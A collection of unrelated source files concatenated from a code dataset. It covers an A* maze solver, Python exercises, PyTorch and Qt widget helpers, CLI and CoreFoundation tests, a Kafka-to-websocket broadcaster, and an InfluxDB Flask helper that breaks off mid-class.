        (or None when the open queue is exhausted without reaching the goal).
        """
        # Create start and end nodes with zeroed g/h/f costs.
        start_node = Node(None, tuple(self.start))
        start_node.g = 0
        start_node.h = 0
        start_node.f = 0
        end_node = Node(None, tuple(self.end))
        end_node.g = 0
        end_node.h = 0
        end_node.f = 0
        # queue: discovered-but-unexpanded nodes (the "open list"); we always
        # expand the node with the lowest total cost f.
        queue = []
        # visited_list: nodes that have already been expanded (the "closed list").
        visited_list = []
        # Add the start node
        queue.append(start_node)
        # Safety valve so a pathological search cannot loop forever.
        counter = 0
        max_steps = (len(self.maze) // 2) ** 10
        # Grid dimensions (len-based; see class docstring).
        no_rows = len(self.maze)
        no_columns = len(self.maze[0])
        # Loop until you find the end
        while len(queue) > 0:
            # Every time any node is visited increase the counter
            counter += 1
            # Get the queued node with the lowest f
            current_node = queue[0]
            current_index = 0
            for index, item in enumerate(queue):
                if item.f < current_node.f:
                    current_node = item
                    current_index = index
            # if we hit this point return the path such as it may be no solution or
            # computation cost is too high
            if counter > max_steps:
                print("Destination cannot be reached")
                return self.return_path(current_node, self.maze)
            # Pop current node off the open list and mark it visited
            queue.pop(current_index)
            visited_list.append(current_node)
            # check if goal is reached or not
            if current_node == end_node:
                return self.return_path(current_node, self.maze)
            # Generate all walkable neighbours of the current cell
            coordinates = []
            for move in self.move:
                current_node_position = (current_node.position[0] + move[0], current_node.position[1] + move[1])
                # skip moves that would leave the grid
                if (current_node_position[0] > (no_rows - 1) or current_node_position[0] < 0 or current_node_position[1] > (no_columns - 1) or current_node_position[1] < 0):
                    continue
                # Make sure walkable terrain
                if self.maze[current_node_position[0]][current_node_position[1]] != 0:
                    continue
                new_node = Node(current_node, current_node_position)
                coordinates.append(new_node)
            # Loop through children
            for child in coordinates:
                # Child is on the visited list (search entire visited list)
                if len([visited_child for visited_child in visited_list if visited_child == child]) > 0:
                    continue
                # calculate f, g, and h values
                child.g = current_node.g + self.cost
                # heuristic: squared euclidean distance to the goal
                child.h = (((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2))
                child.f = child.g + child.h
                # Skip if a copy with a lower-or-equal g is already queued
                if len([i for i in queue if child == i and child.g > i.g]) > 0:
                    continue
                queue.append(child)
class Preprocess:
    """Parse a bracketed matrix string (e.g. "[[0, 1], [1, 0]]") into an
    n x m list-of-lists of ints."""

    def __init__(self, maze, n, m):
        self.maze = maze  # raw matrix string as typed by the user
        self.n = n        # number of rows
        self.m = m        # number of columns

    def check(self, value):
        """Return *value* with every '[' and ']' character removed."""
        return ''.join(ch for ch in value if ch not in '[]')

    def process_text(self):
        """Split the raw string on commas and rebuild the n x m int matrix.

        int() tolerates the surrounding whitespace left after stripping the
        brackets, so no extra trimming is needed.
        """
        tokens = self.maze.split(',')
        rows = []
        idx = 0
        for _ in range(self.n):
            row = []
            for _ in range(self.m):
                row.append(int(self.check(tokens[idx])))
                idx += 1
            rows.append(row)
        return rows
if __name__ == '__main__':
    # Read maze dimensions, the maze string, endpoints and step cost from stdin.
    no_rows = int(input("Enter number of rows: "))
    no_cols = int(input("Enter number of columns: "))
    matrix = Preprocess(str(input("Enter Matrix: ")), no_rows, no_cols).process_text()
    start_x = int(input("Enter x coordinate of starting node: "))
    start_y = int(input("Enter y coordinate of starting node: "))
    end_x = int(input("Enter x coordinate of ending node: "))
    end_y = int(input("Enter y coordinate of ending node: "))
    cost = int(input("Enter cost: "))
    start = [start_x, start_y]
    end = [end_x, end_y]
    path = FindPath(matrix, cost, start, end).search()
    # search() returns None when the open queue empties without reaching the
    # goal; use an identity check instead of `!= None`.
    if path is not None:
        print("Path found: ")
        for row in path:
            for step in row:
                # Cells not on the path are marked -1; print them as 0.
                print(0 if step == -1 else step, end=" ")
            print()
    else:
        print("No Path found")

# Sample session:
# Enter number of rows: 5
# Enter number of columns: 6
# Enter Matrix: [[0, 1, 0, 0, 0, 0],
# [0, 1, 0, 0, 0, 0],
# [0, 1, 0, 1, 0, 0],
# [0, 1, 0, 0, 1, 0],
# [0, 0, 0, 0, 1, 0]]
# Enter x coordinate of starting node: 0
# Enter y coordinate of starting node: 0
# Enter x coordinate of ending node: 4
# Enter y coordinate of ending node: 5
# Enter cost: 1
# Path found:
# 0 0 0 0 0 0
# 1 0 0 0 0 0
# 2 0 0 0 7 0
# 3 0 0 6 0 8
# 0 4 5 0 0 9
| StarcoderdataPython |
3247872 | <filename>3/3-9.py
#-*- coding:utf-8 -*-
# Exercise 3-9: manage a dinner guest list — invite, replace a guest,
# grow the table, shrink it back, and finally empty the list.

welcome_person = ['<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>']

# First round of invitations.
for guest in welcome_person:
    print(f'welcome to my home to eat dinner,{guest}')

# One guest cannot make it: announce it, swap in a replacement, re-invite.
print(f"{welcome_person[4]}don't have time!")
welcome_person[4] = '<NAME>'
for guest in welcome_person:
    print(f'welcome to my home to eat dinner,{guest}')

# Found a bigger table: add three more guests and invite everyone again.
print('I find a bigger zhuozi!')
welcome_person.insert(0, '<NAME>')
welcome_person.insert(3, '<NAME>')
welcome_person.append('fa ge')
for guest in welcome_person:
    print(f'welcome to my home to eat dinner,{guest}')

# The table shrinks again: uninvite from the end until two guests remain.
print("I'm sorry to said that i can only welcome 2 people!")
while len(welcome_person) > 2:
    dropped = welcome_person.pop()
    print(f'sorry,{dropped}我们下次再约!')
for guest in welcome_person:
    print(f'welcome to my home to eat dinner,{guest}')

print('-------------------')
print(len(welcome_person))
print('-------------------')
# Remove the remaining two guests and show the (now empty) list.
del welcome_person[0:2]
print(welcome_person)
print(type(welcome_person))
1736864 | """Implementation of Rule L009."""
from ..base import BaseCrawler, LintResult, LintFix
from ..doc_decorators import document_fix_compatible
@document_fix_compatible
class Rule_L009(BaseCrawler):
    """Files must end with a trailing newline."""

    def _eval(self, segment, siblings_post, parent_stack, **kwargs):
        """Files must end with a trailing newline.

        We only care about the segment and the siblings which come after it
        for this rule, we discard the others into the kwargs argument.
        """
        # A violation can only be raised on the last raw segment of the file,
        # and only when that segment is neither a newline nor a meta segment.
        if (
            len(self.filter_meta(siblings_post)) > 0
            or len(segment.segments) > 0
            or segment.name == "newline"
            or segment.is_meta
        ):
            return None
        # This looks like the end of the file, but confirm it: every parent
        # must also end here, i.e. the segment must run to the final character.
        file_len = len(parent_stack[0].raw)
        pos = segment.pos_marker.char_pos
        if file_len != pos + len(segment.raw):
            return None
        # Build a newline to insert after the final segment; without an edit
        # fix this rule could never produce a match.
        ins = self.make_newline(pos_marker=segment.pos_marker.advance_by(segment.raw))
        return LintResult(
            anchor=segment, fixes=[LintFix("edit", segment, [segment, ins])]
        )
| StarcoderdataPython |
95350 | <filename>constants.py
import numpy as np
def get_constants():
    """Return the static configuration dictionary for the image pipeline.

    Two sections:
      * 'background_cleaning' -- colour thresholds (presumably HSV given the
        0-180 first channel -- confirm against the consumer), rotation
        angles and scoring parameters for background removal;
      * 'split_image'         -- histogram bin size used when splitting.
    """
    background_cleaning = {
        'lower_white': np.array([0, 0, 0], dtype=np.uint8),
        'upper_white': np.array([180, 10, 255], dtype=np.uint8),
        'angles': list(range(-15, 15)),
        'left_book_start_threshold': 800,
        'right_book_start_threshold': 800,
        'donot_alter_angle_threshold': 1000,
        'ignore_fraction': 0.25,
        'gradient': 25,
        'mean_factor': 0.7,
        'score_multiplier': [1, 0.8, 0.5, 0.3, 0.1],
    }
    split_image = {
        'bin_size': 5,
    }
    return {
        'background_cleaning': background_cleaning,
        'split_image': split_image,
    }
| StarcoderdataPython |
1765198 | from distutils.core import setup
# Packaging metadata for the `needs` library.
# NOTE(review): distutils is deprecated and removed in Python 3.12 —
# consider migrating to setuptools.setup, which accepts the same arguments.
setup(
    name="needs",
    packages=["needs"],
    version="1.0.9",
    description="Boolean Contexts",
    author="<NAME>",
    author_email="<EMAIL>",
    url="https://github.com/astex/needs",
    keywords=["context", "permissions", "needs", "roles"],
    classifiers=[
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Development Status :: 4 - Beta",
        "Environment :: Other Environment",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Internet"
    ],
    long_description="""\
Needs
-----
Boolean contexts. A pythonic way of expressing what your code needs
"""
)
| StarcoderdataPython |
1749818 | <gh_stars>1-10
import dash_mantine_components as dmc
from dash import Output, Input, callback
# MultiSelect demo: shows an inline error until at least two pairs are chosen.
component = dmc.MultiSelect(
    data=["USDINR", "EURUSD", "USDTWD", "USDJPY"],
    id="multi-select-error",
    value=["USDJPY"],
    style={"width": 400},
)


@callback(Output("multi-select-error", "error"), Input("multi-select-error", "value"))
def select_value(value):
    # Return the error text for the component; an empty string clears it.
    return "Select at least 2." if len(value) < 2 else ""
| StarcoderdataPython |
106883 | <gh_stars>100-1000
""" Mixins for nn.Modules for better textual visualization. """
from textwrap import indent
class LayerReprMixin:
    """ Adds useful properties and methods for nn.Modules, mainly related to visualization and introspection. """
    # Children whose transient `verbosity` flag is below this threshold
    # render as empty strings in __repr__.
    VERBOSITY_THRESHOLD = 10

    @property
    def num_frozen_parameters(self):
        # Total element count of parameters with requires_grad=False.
        return sum(p.numel() for p in self.parameters() if not p.requires_grad)

    @property
    def num_trainable_parameters(self):
        # Total element count of parameters with requires_grad=True.
        return sum(p.numel() for p in self.parameters() if p.requires_grad)

    @property
    def num_parameters(self):
        # Total element count of all parameters.
        return sum(p.numel() for p in self.parameters())

    def __repr__(self):
        # The flags read here (`verbosity`, `collapsible`) are set temporarily
        # by prepare_repr via Module.apply and deleted afterwards.
        if hasattr(self, 'verbosity') and self.verbosity < self.VERBOSITY_THRESHOLD:
            return ''
        msg = super().__repr__()
        if getattr(self, 'collapsible', False):
            # Collapse single-child "(layer): ..." wrappers onto one line.
            # NOTE(review): the whitespace inside these replace patterns looks
            # mangled (the second replace is a no-op as written) — confirm the
            # intended space counts against the upstream source.
            msg = msg.replace('(\n (layer): ', ':').replace('\n ', '\n ')
            msg = msg.replace('\n )\n)', '\n)').replace(')\n)', ')')
        return msg

    def prepare_repr(self, verbosity=1, collapsible=True, show_num_parameters=False, extra=False):
        """ Set flags on children, call `repr`, delete flags.
        Returns string.
        """
        def set_flags(module):
            # Attach the rendering options to every submodule so that the
            # recursive __repr__ calls can see them.
            setattr(module, 'verbosity', verbosity)
            setattr(module, 'collapsible', collapsible)
            setattr(module, 'show_num_parameters', show_num_parameters)
            setattr(module, 'extra', extra)

        def del_flags(module):
            # Remove the temporary flags; AttributeError is ignored because a
            # submodule may not have had them set (or they were already removed).
            try:
                delattr(module, 'verbosity')
                delattr(module, 'collapsible')
                delattr(module, 'show_num_parameters')
                delattr(module, 'extra')
            except AttributeError:
                pass

        self.apply(set_flags)
        msg = repr(self)
        self.apply(del_flags)
        return msg

    def repr(self, verbosity=1, collapsible=True, show_num_parameters=False, extra=False):
        """ Set flags on children, call `repr`, delete flags.
        Prints output to stdout.
        """
        print(self.prepare_repr(verbosity=verbosity, collapsible=collapsible,
                                show_num_parameters=show_num_parameters, extra=extra))
class ModuleDictReprMixin(LayerReprMixin):
    """ Mixin to allow `repr` for multiple levels for nn.ModuleDicts.
    Also adds `__getitem__` for convenience.
    Relies on modules having `shapes` dictionary, that for each children stores the information about their
    input and output shapes.
    Depending on `verbosity`, creates string representation for different levels:
        - verbosity 1, modules and their shapes. For example, shapes of `initial_block`, `body` and `head`.
        - verbosity 2, blocks inside modules. For example, shapes of blocks inside Encoder.
        - verbosity 3, blocks inside repeated chains of `:class:~.blocks.Block`. Mainly used for debug purposes.
        - verbosity 4, letters inside each `:class:~.layers.MultiLayer`. For example, each letter inside given block.
        - verbosity 5, PyTorch implementations of each letter inside `:class:~.layers.MultiLayer`.
        - verbosity 6+, default repr of nn.Module.
    For most cases, levels 2 and 4 should be used.
    Additional parameters can be used to show number of parameters inside each level and collapse multilines.
    """
    def __getitem__(self, key):
        # Convenience: allow positional (integer) indexing into the dict keys.
        if isinstance(key, int):
            key = list(self.keys())[key]
        return super().__getitem__(key)

    def prepare_shape(self, shape, indent=0):
        """ Beautify shape or list of shapes.
        Changes the first dimension (batch) to `?`.
        Makes multiple lines for lists of shapes with provided indentation.
        """
        #pylint: disable=redefined-outer-name
        if isinstance(shape, tuple):
            # Single shape: drop the batch dimension, align items to 3 chars.
            msg = ', '.join([f'{item:>3}' for item in shape[1:]])
            return f' (?, {msg}) '
        if isinstance(shape, list):
            # List of shapes: first inline, the rest on their own indented lines.
            msg = '[' + self.prepare_shape(shape[0])[1:-1] + ','
            for shape_ in shape[1:]:
                msg += '\n ' + ' '*indent + self.prepare_shape(shape_)[1:-1] + ','
            msg = msg[:-1] + ']'
            return msg
        raise TypeError(f'Should be used on tuple or list of tuples, got {type(shape)} instead.')

    def __repr__(self):
        # `verbosity` is set temporarily by LayerReprMixin.prepare_repr;
        # without it, fall back to the default nn.Module repr.
        if hasattr(self, 'verbosity'):
            indent_prefix = ' '

            # Parse verbosity. If equal to max level, set flag
            verbosity = self.verbosity
            if verbosity >= 5:
                verbosity = 4
                detailed_last_level = True
            else:
                detailed_last_level = False

            if len(self.keys()):
                key = list(self.keys())[0]
                input_shapes, output_shapes = None, None
                if (len(self.items()) == 1 and getattr(self, 'collapsible', False)
                    and getattr(self[key], 'VERBOSITY_THRESHOLD', -1) == self.VERBOSITY_THRESHOLD):
                    # Subclasses names can be folded, i.e. `Block:ResBlock(` instead of `Block(\n ResBlock(`
                    msg = self._get_name() + ':' + repr(self[key])
                    msg = msg.replace(')\n)', ')')
                else:
                    msg = self._get_name() + '(\n'
                    extra_repr = self.extra_repr()
                    if extra_repr:
                        msg += indent(extra_repr, prefix=indent_prefix) + '\n'
                    # Pad every key so the shape columns line up.
                    max_key_length = max(len(key) for key in self.keys())
                    for key, value in self.items():
                        # Short description: module name and description of shapes
                        empty_space = ' ' * (1 + max_key_length - len(key))
                        module_short_description = f'({key}:{empty_space}'
                        if key in self.shapes:
                            input_shapes, output_shapes = self.shapes.get(key)
                            current_line_len = len(module_short_description)
                            input_shapes = self.prepare_shape(input_shapes, indent=current_line_len)
                            module_short_description += input_shapes + ' ⟶ '
                            current_line_len = len(module_short_description.splitlines()[-1]) + 1
                            output_shapes = self.prepare_shape(output_shapes, indent=current_line_len).strip(' ')
                            module_short_description += output_shapes
                        if getattr(self, 'show_num_parameters', False):
                            num_parameters = sum(p.numel() for p in value.parameters() if p.requires_grad)
                            module_short_description += f', #params={num_parameters:,}'
                        module_short_description += ')'
                        # Long description: ~unmodified repr of a module
                        module_long_description = repr(value).strip(' ')
                        # Select appropriate message
                        module_description = ''
                        if verbosity > self.VERBOSITY_THRESHOLD:
                            module_description = f'({key}): ' + module_long_description
                        if verbosity == self.VERBOSITY_THRESHOLD or module_description == f'({key}): ':
                            module_description = module_short_description
                        if self.VERBOSITY_THRESHOLD == 4 and detailed_last_level:
                            module_description = (module_short_description + ':\n' +
                                                  indent(module_long_description, prefix=indent_prefix))
                        msg += indent(module_description, prefix=indent_prefix) + '\n'
                        msg = msg.replace('\n\n', '\n')
                    msg += ')'
                    # Collapse single repeated-chain children (`r0`) onto one line.
                    if len(self.items()) == 1 and getattr(self, 'collapsible', False) and 'r0' in msg:
                        msg = msg.replace('(\n (r0:', '(r0:', 1)
                        msg = msg.replace(')\n)', ')')
            else:
                msg = self._get_name() + '()'
            return msg
        return super().__repr__()
# Re-use the verbosity documentation from ModuleDictReprMixin (everything
# after its three summary lines) on the two public repr helpers.
REPR_DOC = ModuleDictReprMixin.__doc__.split('\n', 3)[3]
LayerReprMixin.prepare_repr.__doc__ += '\n' + REPR_DOC
LayerReprMixin.repr.__doc__ += '\n' + REPR_DOC
| StarcoderdataPython |
1704079 | import os
import pytest
from click.testing import CliRunner
from paths_cli.commands.append import *
import openpathsampling as paths
def make_input_file(tps_network_and_traj):
    """Write the fixture objects (plus a 'template' snapshot tag) into setup.nc."""
    storage = paths.Storage("setup.nc", mode='w')
    for obj in tps_network_and_traj:
        storage.save(obj)
    storage.tags['template'] = storage.snapshots[0]
    storage.close()
    return "setup.nc"
def test_append(tps_network_and_traj):
    """Append volumes, then a tagged snapshot, to the same output file."""
    runner = CliRunner()
    with runner.isolated_filesystem():
        in_file = make_input_file(tps_network_and_traj)
        result = runner.invoke(append, [in_file, '-a', 'output.nc',
                                        '--volume', 'A', '--volume', 'B'])
        assert result.exception is None
        assert result.exit_code == 0
        storage = paths.Storage('output.nc', mode='r')
        assert len(storage.volumes) == 2
        assert len(storage.snapshots) == 0
        storage.volumes['A']  # smoke tests that we can load
        storage.volumes['B']
        storage.close()
        result = runner.invoke(append, [in_file, '-a', 'output.nc',
                                        '--tag', 'template'])
        # BUG FIX: the second invocation's outcome was never asserted and the
        # second storage was never closed, unlike every other test here.
        assert result.exception is None
        assert result.exit_code == 0
        storage = paths.Storage('output.nc', mode='r')
        assert len(storage.volumes) == 2
        assert len(storage.snapshots) == 2  # one snapshot + reverse
        storage.close()
@pytest.mark.parametrize('n_objects', [0, 2])
def test_append_tag_error(tps_network_and_traj, n_objects):
    """--save-tag must fail unless exactly one object is being appended."""
    extra_args = {2: ['--volume', "A", '--volume', "B"], 0: []}[n_objects]
    cli = CliRunner()
    with cli.isolated_filesystem():
        setup_file = make_input_file(tps_network_and_traj)
        result = cli.invoke(append,
                            [setup_file, '-a', "output.nc"] + extra_args
                            + ["--save-tag", "foo"])
        assert isinstance(result.exception, RuntimeError)
        assert "Can't identify the object to tag" in str(result.exception)
def test_append_tag(tps_network_and_traj):
    """Appending a tagged object under a new tag name stores it as 'foo'."""
    cli = CliRunner()
    with cli.isolated_filesystem():
        setup_file = make_input_file(tps_network_and_traj)
        result = cli.invoke(append,
                            [setup_file, '-a', "output.nc",
                             '--tag', 'template', '--save-tag', 'foo'])
        assert result.exit_code == 0
        assert result.exception is None
        store = paths.Storage("output.nc", mode='r')
        assert len(store.snapshots) == 2
        assert len(store.tags) == 1
        assert store.tags['foo'] is not None
        store.close()
def test_append_same_tag(tps_network_and_traj):
    """Without --save-tag the original tag name is carried over."""
    cli = CliRunner()
    with cli.isolated_filesystem():
        setup_file = make_input_file(tps_network_and_traj)
        result = cli.invoke(append,
                            [setup_file, '-a', "output.nc",
                             '--tag', 'template'])
        assert result.exit_code == 0
        assert result.exception is None
        store = paths.Storage("output.nc", mode='r')
        assert len(store.snapshots) == 2
        assert len(store.tags) == 1
        assert store.tags['template'] is not None
        store.close()
def test_append_remove_tag(tps_network_and_traj):
    """An empty --save-tag drops the tag while keeping the snapshot."""
    cli = CliRunner()
    with cli.isolated_filesystem():
        setup_file = make_input_file(tps_network_and_traj)
        result = cli.invoke(append,
                            [setup_file, '-a', "output.nc",
                             "--tag", 'template', '--save-tag', ''])
        assert result.exception is None
        assert result.exit_code == 0
        store = paths.Storage("output.nc", mode='r')
        assert len(store.snapshots) == 2
        assert len(store.tags) == 0
        store.close()
| StarcoderdataPython |
1754397 | from PySide6.QtCore import QPoint, Qt, Signal
from PySide6.QtGui import QIntValidator
from PySide6.QtWidgets import QHBoxLayout, QLineEdit, QSizePolicy, QSlider, QToolTip, QWidget, QApplication
class QRangeL(QLineEdit):
    """Line edit restricted to integers within a [min, max] range."""

    # Emitted whenever the value is programmatically set (including clamping).
    newValue = Signal()

    def __init__(self, min=0, max=100, value=0):
        super().__init__()
        self._min = min
        self._max = max
        self.value = value
        self.setValidator(QIntValidator(self._min, self._max))
        self.inputRejected.connect(self._updateValue)
        self.textEdited.connect(self._updateValue)
        self._refreshToolTip()

    def _refreshToolTip(self):
        # Advertise the accepted range in the tooltip.
        self.setToolTip(f'{self._min}..{self._max}')

    def _updateValue(self):
        digits = ''.join(ch for ch in self.text() if ch.isdigit())
        if not self.hasAcceptableInput():
            # Point out the valid range when the current text is rejected.
            QToolTip.showText(self.mapToGlobal(QPoint(0, 10)), self.toolTip(), msecShowTime=2000)
        if digits:
            self.value = int(digits)

    @property
    def value(self) -> int:
        # NOTE: returns None when the field contains no digits.
        digits = ''.join(ch for ch in self.text() if ch.isdigit())
        if not digits:
            return None
        return int(digits)

    @value.setter
    def value(self, new_value: int = 0):
        # Clamp into the allowed range before updating the text.
        if new_value > self._max:
            new_value = self._max
        elif new_value < self._min:
            new_value = self._min
        self.setText(str(new_value))
        self.newValue.emit()

    @property
    def min(self) -> int:
        return self._min

    @min.setter
    def min(self, min: int = 0):
        # Raising the floor above the current value drags the value up with it.
        if min > self.value:
            self.value = min
        self._min = min
        self._refreshToolTip()
        self.setValidator(QIntValidator(self._min, self._max))

    @property
    def max(self) -> int:
        return self._max

    @max.setter
    def max(self, max: int = 100):
        # Lowering the ceiling below the current value drags the value down.
        if max < self.value:
            self.value = max
        self._max = max
        self._refreshToolTip()
        self.setValidator(QIntValidator(self._min, self._max))
class QRangeLS(QWidget):
    """Composite widget pairing a QRangeL line edit with a synchronized slider."""

    # Re-emitted whenever either child widget changes the shared value.
    newValue = Signal()

    def __init__(self, min=0, max=100, value=0, lineStrech=1, sliderStrech=4):
        super().__init__()
        self.line = QRangeL()
        self.line.newValue.connect(self.line_new_value)
        size_policy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
        size_policy.setHorizontalStretch(lineStrech)
        self.line.setSizePolicy(size_policy)
        self.slider = QSlider(Qt.Horizontal)
        self.slider.valueChanged.connect(self.slider_new_value)
        # Qt copies the policy on assignment, so mutating it again is safe.
        size_policy.setHorizontalStretch(sliderStrech)
        self.slider.setSizePolicy(size_policy)
        self.slider.setPageStep(1)
        self.layout = QHBoxLayout()
        self.layout.setContentsMargins(0, 0, 0, 0)
        self.layout.addWidget(self.line)
        self.layout.addWidget(self.slider)
        self.setLayout(self.layout)
        self.min = min
        self.max = max
        self.value = value

    def line_new_value(self):
        # Keep the slider in step with the line edit.
        self.slider.setValue(self.line.value)
        self.newValue.emit()

    def slider_new_value(self):
        # Keep the line edit in step with the slider.
        self.line.value = self.slider.value()
        self.newValue.emit()

    @property
    def value(self) -> int:
        return self.line.value

    @value.setter
    def value(self, new_value: int = 0):
        self.line.value = new_value
        self.slider.setValue(self.line.value)

    @property
    def min(self) -> int:
        return self.line.min

    @min.setter
    def min(self, new_min: int = 0):
        self.line.min = new_min
        self.slider.setMinimum(self.line.min)

    @property
    def max(self) -> int:
        return self.line.max

    @max.setter
    def max(self, new_max: int = 100):
        self.line.max = new_max
        self.slider.setMaximum(self.line.max)
class Window(QWidget):
    """Demo window hosting a single QRangeLS widget."""

    def __init__(self):
        super(Window, self).__init__()
        box = QHBoxLayout()
        box.addWidget(QRangeLS())
        self.setLayout(box)
if __name__ == '__main__':
    import sys

    # Manual smoke test: show the demo window until the user closes it.
    qt_app = QApplication(sys.argv)
    win = Window()
    win.show()
    qt_app.exec()
3323271 | import websockets
import asyncio
import time
from .kafka_consumers import async_kafka
# {topic_id: KafkaConsumer}
broadcaster_lock = asyncio.Lock()
topic_broadcasters = {}
# {topic_id: [ClientHandler, ClientHandler ...]}
subscriptions_lock = asyncio.Lock()
client_subscriptions = {}
tasks_lock = asyncio.Lock()
tasks = {}
published_lock = asyncio.Lock()
n_published = 0
async def subscribe(topic_id: str, client):
    """Register *client* for *topic_id*, starting a Kafka consumer and a
    broadcast task on the first subscription to that topic.

    Silently does nothing when no consumer can be obtained for the topic.
    """
    async with broadcaster_lock:
        async with subscriptions_lock:
            if topic_id not in topic_broadcasters.keys():
                assert topic_id not in client_subscriptions.keys()
                consumer = await async_kafka.get_consumer(topic_id)
                if not consumer:
                    # BUG FIX: the locks were previously released manually
                    # here, so the `async with` blocks released them a second
                    # time on exit and raised RuntimeError. Returning while
                    # still inside the context managers is sufficient.
                    return
                topic_broadcasters[topic_id] = consumer
                client_subscriptions[topic_id] = [client]
                task = asyncio.create_task(run_topic(topic_id))
                async with tasks_lock:
                    tasks[topic_id] = task
            else:
                client_subscriptions[topic_id].append(client)
async def unsubscribe(topic_id: str, client):
    """Remove *client* from *topic_id*; tear down the consumer and the
    broadcast task when no subscribers remain."""
    async with broadcaster_lock:
        async with subscriptions_lock:
            # BUG FIX: guard against unknown topics so a stray unsubscribe
            # cannot raise KeyError on the lookup below.
            if topic_id not in client_subscriptions:
                print(f"no subscribers for {topic_id}")
                return
            if client not in client_subscriptions[topic_id]:
                print(f"client is not subscribed to {topic_id}")
                return
            client_subscriptions[topic_id].remove(client)
            if len(client_subscriptions[topic_id]) == 0:
                # Last subscriber gone: shut down the topic end-to-end.
                await async_kafka.shutdown_topic(topic_id)
                del client_subscriptions[topic_id]
                del topic_broadcasters[topic_id]
                async with tasks_lock:
                    tasks[topic_id].cancel()
                    del tasks[topic_id]
async def run_topic(topic_id):
    """Forward every Kafka message on *topic_id* to all subscribed clients."""
    global n_published
    async for msg in topic_broadcasters[topic_id]:
        recipients = [client.get_ws() for client in client_subscriptions[topic_id]]
        websockets.broadcast(recipients, msg)
        async with published_lock:
            n_published += 1
async def shutdown():
    """Cancel every running broadcast task."""
    async with tasks_lock:
        # BUG FIX: iterating the dict directly yields topic-id strings, which
        # have no .cancel(); iterate the task objects instead.
        for task in tasks.values():
            task.cancel()
def debug():
    """Print a snapshot of the broadcaster/subscription state to stdout."""
    lines = [
        f"---------------ts: {int(time.time())}---------------",
        f"Messages Broadcasted: {n_published}",
        f"Broadcasters: {topic_broadcasters}",
        f"Subscribers: {client_subscriptions}",
        f"--------------------------------------------\n",
    ]
    print("\n".join(lines))
1623951 | <filename>osx/test/test_cfarray.py
##
# Copyright (c) 2010-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from ..corefoundation import CFArrayRef, CFStringRef
import gc
import unittest
"""
CFArrayRef tests.
"""
class CFArrayRefTestCase(unittest.TestCase):
    """
    Tests for L{CFArrayRef}.
    """

    @staticmethod
    def _sampleArray():
        # Two-element CFArray of CFStrings shared by every test.
        return CFArrayRef.fromList(
            (CFStringRef.fromString("abc"), CFStringRef.fromString("def"),)
        )

    def test_typeid(self):
        """
        Make sure L{CFArrayRef.instanceTypeId} returns the right value.
        """
        arr = self._sampleArray()
        self.assertEqual(arr.instanceTypeId(), CFArrayRef.typeId())

    def test_description(self):
        """
        Make sure L{CFArrayRef.description} is the correct string.
        """
        arr = self._sampleArray()
        self.assertTrue("CFArray" in arr.description(), msg=arr.description())

    def test_retain(self):
        """
        Make sure L{CFArrayRef.retainCount} returns the correct value based on ownership.
        """
        first = self._sampleArray()
        self.assertEqual(first.retainCount(), 1)
        # A non-owning wrapper bumps the retain count of the same CFArray.
        second = CFArrayRef(first.ref(), owned=False)
        self.assertEqual(first.retainCount(), 2)
        self.assertEqual(second.retainCount(), 2)
        del first
        gc.collect()
        self.assertEqual(second.retainCount(), 1)

    def test_to_from_list(self):
        """
        Make sure L{CFArrayRef.fromString} and L{CFArrayRef.toString} work properly.
        """
        arr = self._sampleArray()
        self.assertEqual(arr.toList(), ["abc", "def", ])

    def test_count(self):
        """
        Make sure L{CFArrayRef.count} returns the right number.
        """
        self.assertEqual(self._sampleArray().count(), 2)

    def test_valueAt(self):
        """
        Make sure L{CFArrayRef.valueAtIndex} returns the right number.
        """
        arr = self._sampleArray()
        self.assertEqual(arr.valueAtIndex(0), "abc")
        self.assertEqual(arr.valueAtIndex(1), "def")
| StarcoderdataPython |
43023 |
def is_black(x):
    """True when the grid-cell character marks a black square ('#')."""
    return x == '#'


def is_square(box, N):
    """Return True when the black cells of the N x N grid `box` form exactly
    one solid, axis-aligned square (at least 1x1)."""
    first_row = first_col = last_row = last_col = None
    for row in range(N):
        for col in range(N):
            if first_col is None or last_col is None:
                # Still scanning for the first black run, which fixes the
                # candidate square's top edge and width.
                if is_black(box[row][col]):
                    if first_col is None:
                        first_col, first_row = col, row
                    elif col == N - 1:
                        last_col = col
                        last_row = first_row + last_col - first_col
                elif first_col is not None:
                    last_col = col - 1
                    last_row = first_row + last_col - first_col
            else:
                # Candidate square known: every black cell must lie inside it
                # and every cell inside it must be black.
                if is_black(box[row][col]):
                    if col < first_col or col > last_col or row - first_row > last_col - first_col:
                        return False
                elif first_col <= col <= last_col and row - first_row <= last_col - first_col:
                    return False
    return first_col is not None
# Python 2 script: read input1.txt (T test cases, each an N followed by an
# N x N grid) and report whether the '#' cells form exactly one solid square.
with open("input1.txt") as f:
    T = int(f.readline())
    for t in xrange(0, T):
        N = int(f.readline())
        c = []
        # Collect the N grid rows, stripping trailing newlines.
        for i in xrange(0, N):
            c.append(f.readline().rstrip('\n'))
        print "Case #%d: %s" % (t+1,
                                "YES" if is_square(c, N) else "NO")
4813762 | <reponame>asymworks/fitbit2influx<gh_stars>0
# Fitbit2InfluxDB Influx Connection
import influxdb
class InfluxDB(object):
    '''InfluxDB Helper for Flask'''

    def __init__(self, app=None):
        # The client stays None until init_app wires up a real connection.
        self._client = None
        self.app = app
        if app:
            self.init_app(app)

    def init_app(self, app):
        '''Setup the InfluxDB Connection'''
        config = app.config
        self._client = influxdb.InfluxDBClient(
            host=config.get('INFLUX_HOST', 'localhost'),
            port=config.get('INFLUX_PORT', 8086),
            database=config.get('INFLUX_DATABASE', None),
            username=config.get('INFLUX_USERNAME', None),
            password=config.get('INFLUX_PASSWORD', None),
            ssl=config.get('INFLUX_SSL', False),
            verify_ssl=config.get('INFLUX_VERIFY_SSL', False),
        )
        self.app = app
        self.app.influx = self

    @property
